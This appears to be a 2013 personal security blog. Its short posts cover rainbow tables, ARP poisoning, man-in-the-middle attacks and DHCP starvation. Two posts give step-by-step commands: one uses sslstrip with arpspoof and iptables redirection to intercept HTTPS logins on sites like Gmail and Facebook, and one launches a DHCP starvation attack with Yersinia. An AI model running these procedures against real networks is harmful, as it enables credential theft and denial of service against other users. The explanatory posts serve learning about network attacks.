Sumit Rajput

Wednesday, 19 June 2013

Rainbow Table In Cryptography

A rainbow table is a precomputed table for reversing cryptographic hash functions, usually for cracking password hashes. Tables are usually used in recovering the plaintext password, up to a certain length consisting of a limited set of characters. It is a practical example of a space/time trade-off, using more computer processing time at the cost of less storage when calculating a hash on every attempt, or less processing time and more storage when compared to a simple lookup table with one entry per hash. Use of a key derivation function that employs a salt makes this attack infeasible.

Tuesday, 18 June 2013

How To Sniff HTTPS

If you want to sniff websites having https environment then you should try SSL Strip it helps you to sniff https sites. Like Gmail Yahoo And Facebook.

Setup

tar zxvf sslstrip-0.9.tar.gz
cd sslstrip-0.9
(optional) sudo python ./setup.py install
Running sslstrip

Flip your machine into forwarding mode. (echo "1" > /proc/sys/net/ipv4/ip_forward)

Setup iptables to redirect HTTP traffic to sslstrip. (iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port )

Run sslstrip. (sslstrip.py -l <listenPort>)

Run arpspoof to convince a network they should send their traffic to you. (arpspoof -i <interface> -t <targetIP> <gatewayIP>)
That should do it.

Monday, 17 June 2013

What Is APR Positioning

APR (ARP Poison Routing) is a main feature of the program. It enables sniffing on switched networks and the hijacking of IP traffic between hosts. The name "ARP Poison Routing" derives from the two steps needed to perform such unusual network sniffing: an ARP Poison Attack and routing packets to the correct destination.
ARP Stands For Address Resolvation Protocol
ARP Poison Attack

This kind of attack is based on the manipulation of host's ARP caches. On an Ethernet/IP network when two hosts want to communicate to each other they must know each others MAC addresses. The source host looks at its ARP table to see if there is a MAC address corresponding to the destination host IP address. If not, it broadcasts an ARP Request to the entire network asking the MAC of the destination host. Because this packet is sent in broadcast it will reach every host in a subnet however only the host with the IP address specified in the request will reply its MAC to the source host. On the contrary if the ARP-IP entry for the destination host is already present in the ARP cache of the source host, that entry will be used without generating ARP traffic. We Can Use Cain And Cable Software For APR Posioning.
You can Also See That With A Short Flash File.

Man In The Middle Attack

Monkey In The Middle Attack Is also Known As :

Man-in-the-middle attack
Bucket-brigade attack
Fire brigade attack
Session hijacking
TCP hijacking
TCP session hijacking

This is an Attack used for gathering data from any victim which is connected to the web server by a Simple Hacking Trick. In That Case A Hacker (Attacker) Breaches the connection of his victim to the server and then he gets the connection of victim's computer sends his all requests to the web server but he steals all his information and victim thinks that he is directly connected to the web Server. But in reality The victim is connected through a Hackers PC (Third Person). And Hacker Stealing his all data like Data Packets , Passwords , usernames and more his confidential data. This Is called Man In The Middle Attack.

Saturday, 15 June 2013

DHCP Starvation Attack

This type of attack can easily be achieved with tools such as gobbler. If enough requests flooded onto the network, the attacker can completely exhaust the address space allocated by the DHCP servers for an indefinite period of time. Clients of the victim network are then starved of the DHCP resource(s), thus DHCP Starvation can be classified as a Denial of Service attack. The network attacker can then set up a Rogue DHCP Server on the network and perform man in the middle attacks, or simply set their machine as the default gateway and sniff packets.

Exhausting all of the DHCP addresses may make a Rogue DHCP Server more affective, but it is not manditory. As stated in RFC 2131:
"The client collects DHCPOFFER messages over a period of time, selects one DHCPOFFER message from the (possibly many) incoming DHCPOFFER messages (for example, the first DHCPOFFER message or the DHCPOFFER message from the previously used server) and extracts the server address from the `server identifier' option in the DHCPOFFER message. The time over which the client collects messages and the mechanism used to select one DHCPOFFER are implementation dependent."
Attack Vector

Yersinia DHCP Starvation Attack

Attack Vector

Yersinia is a GNU/Linux framework that takes advantage of some of the weaknesses in different network protocols. It can be used for analyzing and testing deployed networks and systems. To use Yersinia for a DHCP Starvation Attack, the following steps may be followed:

1.Start Yersinia via the command line by typing: yersinia -I.

2.Select a NIC you wish to use by pressing “i”.

3.Load DHCP mode by pressing the “g” key, then select DHCP mode.

4.Press the “x” button to open the attacks menu.

5.Press “1” to start the attack